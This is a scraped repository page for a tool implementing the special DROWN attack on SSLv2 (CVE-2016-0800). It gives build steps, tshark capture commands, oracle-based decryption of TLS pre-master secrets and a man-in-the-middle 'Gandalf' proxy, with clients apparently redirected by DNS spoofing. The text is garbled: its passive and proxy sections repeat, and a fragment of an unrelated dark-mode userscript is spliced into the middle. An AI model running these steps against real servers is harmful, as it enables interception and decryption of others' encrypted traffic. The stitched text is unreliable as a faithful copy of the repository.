  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Universal Dark Mode - works on any site\n(function() {\n var enabled = true;\n \n function applyDarkMode() {\n if (!enabled) return;\n \n // Create style element if it doesn't exist\n var style = document.getElementById('universal-dark-mode-style');\n if (!style) {\n style = document.createElement('style');\n style.id = 'universal-dark-mode-style';\n document.head.appendChild(style);\n }\n \n // Dark mode CSS - inverts colors but preserves images/video\n style.textContent = '\n /* Invert everything except media */\n html {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #1a1a2e !important;\n }\n \n /* Restore images, videos, iframes, canvas */\n img, video, iframe, canvas, svg, picture, [style*=\"background-image\"] {\n filter: invert(1) hue-rotate(180deg) !important;\n }\n \n /* Preserve specific elements that should not be inverted */\n .no-dark-mode, .no-dark-mode *,\n [data-theme=\"light\"], [data-theme=\"light\"],\n .ace_editor, .ace_editor *,\n .CodeMirror, .CodeMirror *,\n .monaco-editor, .monaco-editor *,\n .markdown-body pre, .markdown-body pre *,\n .highlight, .highlight *,\n pre code, pre code * {\n filter: none !important;\n }\n \n /* Fix common UI elements */\n .modal, .popup, .dropdown-menu, .tooltip, .popover {\n filter: invert(1) hue-rotate(180deg) !important;\n background: #2d2d44 !important;\n border-color: #444 !important;\n }\n \n /* Scrollbars */\n ::-webkit-scrollbar { background: #1a1a2e !important; }\n ::-webkit-scrollbar-thumb { background: #444 !important; }\n ::-webkit-scrollbar-thumb:hover { background: #555 !important; }\n \n /* Selection */\n ::selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ::-moz-selection { background: #4ecdc4 !important; color: #1a1a2e !important; }\n ';\n }\n \n function removeDarkMode() {\n var style = document.getElementById('universal-dark-mode-style');\n if (style) style.remove();\n }\n \n // Toggle with Alt+Shift+D\n document.addEventListener('keydown', function(e) {\n if (e.altKey && e.shiftKey && e.key === 'D') {\n e.preventDefault();\n enabled = !enabled;\n if (enabled) {\n applyDarkMode();\n console.log('[Universal Dark Mode] Enabled');\n } else {\n removeDarkMode();\n console.log('[Universal Dark Mode] Disabled');\n }\n }\n });\n \n // Apply on load\n applyDarkMode();\n \n // Re-apply on dynamic content\n var observer = new MutationObserver(function(mutations) {\n if (enabled && !document.getElementById('universal-dark-mode-style')) {\n applyDarkMode();\n }\n });\n observer.observe(document.head, { childList: true });\n \n console.log('[Universal Dark Mode] Loaded - Press Alt+Shift+D to toggle');\n})();", "Universal Dark Mode"); } } catch(__e) { console.warn('[Userscript:Universal Dark Mode]', __e); } })(); })();
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages